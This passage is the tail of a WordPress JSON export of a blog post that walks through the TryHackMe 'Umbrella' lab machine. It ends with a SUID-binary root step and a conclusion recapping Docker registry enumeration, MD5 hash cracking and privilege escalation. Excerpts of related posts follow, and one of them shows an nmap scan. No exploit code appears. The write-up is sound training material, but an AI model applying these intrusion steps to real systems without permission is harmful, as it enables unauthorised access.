100vw, 1000px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"176\" data-attachment-id=\"146\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/suid-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid-2.png?fit=1105%2C190&amp;ssl=1\" data-orig-size=\"1105,190\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"suid-2\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid-2.png?fit=1024%2C176&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid-2.png?resize=1024%2C176&#038;ssl=1\" alt=\"\" class=\"wp-image-146\" style=\"width:944px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid-2.png?resize=1024%2C176&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid-2.png?resize=300%2C52&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid-2.png?resize=768%2C132&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid-2.png?w=1105&amp;ssl=1 1105w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:38px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can execute the binary now and become root!<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"953\" height=\"103\" data-attachment-id=\"147\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/root-final\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/root-final.png?fit=953%2C103&amp;ssl=1\" data-orig-size=\"953,103\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"root-final\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/root-final.png?fit=953%2C103&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/root-final.png?resize=953%2C103&#038;ssl=1\" alt=\"\" class=\"wp-image-147\" style=\"width:937px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/root-final.png?w=953&amp;ssl=1 953w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/root-final.png?resize=300%2C32&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/root-final.png?resize=768%2C83&amp;ssl=1 768w\" sizes=\"auto, (max-width: 953px) 100vw, 953px\" \/><\/figure>\n\n\n\n<div style=\"height:45px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Conclusion<\/mark><\/h2>\n\n\n\n<p>The initial foothold requires a lot of enumeration of the Docker registry and carefully parsing the data. The MD5 hashes were easy to crack and getting a foothold from here was easy. For Privilege Escalation, the key was to find the mounted folder since common privilege escalation scripts failed to find anything useful. Overall, something new to learn and share. If you liked this write-up, please feel free to leave a comment or let me know if you know another way to approach this box.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Umbrella from TryHackMe is a Linux machine with multiple misconfigurations. To get a foothold, we need to perform enumeration on the Docker Registry and obtain credentials for the MySQL database. By accessing the DB, we can get usernames and passwords for multiple users to log in to a webpage and connect to SSH. To get [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1,49,11,13,12],"tags":[],"class_list":["post-103","post","type-post","status-publish","format-standard","hentry","category-blog","category-ctf","category-ctf-write-ups","category-linux","category-tryhackme"],"aioseo_notices":[],"featured_image_src":null,"author_info":{"display_name":"ishsome","author_link":"https:\/\/blog.ishsome.com\/index.php\/author\/e5c77740144cd4a8\/"},"jetpack_featured_media_url":"","jetpack-related-posts":[{"id":422,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/","url_meta":{"origin":103,"position":0},"title":"TryHackMe: Kitty","author":"ishsome","date":"February 5, 2024","format":false,"excerpt":"Kitty from TryHackMe is a Linux machine running a web application with security vulnerabilities. We are tasked with finding the vulnerabilities and exploiting them to gain root privileges on the machine. NMAP We have only two ports open 22 for SSH and HTTP port 80. \u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Linux-Boxes\/Kitty] \u2514\u2500$ nmap -p22,80 10.10.113.181\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":359,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/28\/tryhackme-reset\/","url_meta":{"origin":103,"position":1},"title":"TryHackMe: Reset","author":"ishsome","date":"January 28, 2024","format":false,"excerpt":"Reset is a Windows machine that is part of a domain and consists of many misconfigurations. Our goal is to perform a Pentest as a Red Teamer and exploit the misconfigurations to become the Administrator on the machine. We will begin our enumeration with NMAP as usual. NMAP \u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset] \u2514\u2500$\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":168,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-bulletproof-penguin\/","url_meta":{"origin":103,"position":2},"title":"TryHackMe: Bulletproof Penguin","author":"ishsome","date":"January 24, 2024","format":false,"excerpt":"Bulletproof plugin\u00a0is an easy room that deals with hardening security on the common services that run on a Linux machine. This room covers services such as FTP, MySQL, Redis, SSH, etc., and how their configurations can be changed to secure them from unauthorized access. Our goal in each task is\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":447,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/","url_meta":{"origin":103,"position":3},"title":"TryHackMe: Red Team Capstone Challenge","author":"ishsome","date":"February 18, 2024","format":false,"excerpt":"The Red Team Capstone challenge from TryHackMe is an in-depth network challenge simulating a Red Teaming engagement. The challenge includes several phases structured around the cyber kill chain that will require you to enumerate a perimeter, breach the organization, perform lateral movement, and finally perform goal execution to show impact.\u2026","rel":"","context":"In &quot;Active Directory&quot;","block_context":{"text":"Active Directory","link":"https:\/\/blog.ishsome.com\/index.php\/category\/active-directory\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":414,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/01\/gitlab-cve-2023-7028\/","url_meta":{"origin":103,"position":4},"title":"GitLab CVE-2023-7028","author":"ishsome","date":"February 1, 2024","format":false,"excerpt":"This blog is based on TryHackMe's room on GitLab CVE-2023-7028. Learning Objectives Exploit a GitLab CE instance through CVE 2023-7028 How the exploit works Protection and mitigation measures What is GitLab? GitLab is a renowned and widely adopted web-based repository manager that provides a comprehensive platform for source code management,\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":434,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/03\/what-is-log-poisoning\/","url_meta":{"origin":103,"position":5},"title":"What Is Log Poisoning?","author":"ishsome","date":"February 3, 2024","format":false,"excerpt":"Logs are records generated by various software applications, operating systems, and network devices to keep track of events and activities. They are essential for monitoring, troubleshooting, and security analysis. Log poisoning typically refers to malicious activities or techniques aimed at manipulating or contaminating log files in computer systems. Log poisoning\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]}],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/103","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/comments?post=103"}],"version-history":[{"count":24,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/103\/revisions"}],"predecessor-version":[{"id":163,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/103\/revisions\/163"}],"wp:attachment":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/media?parent=103"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/categories?post=103"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/tags?post=103"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}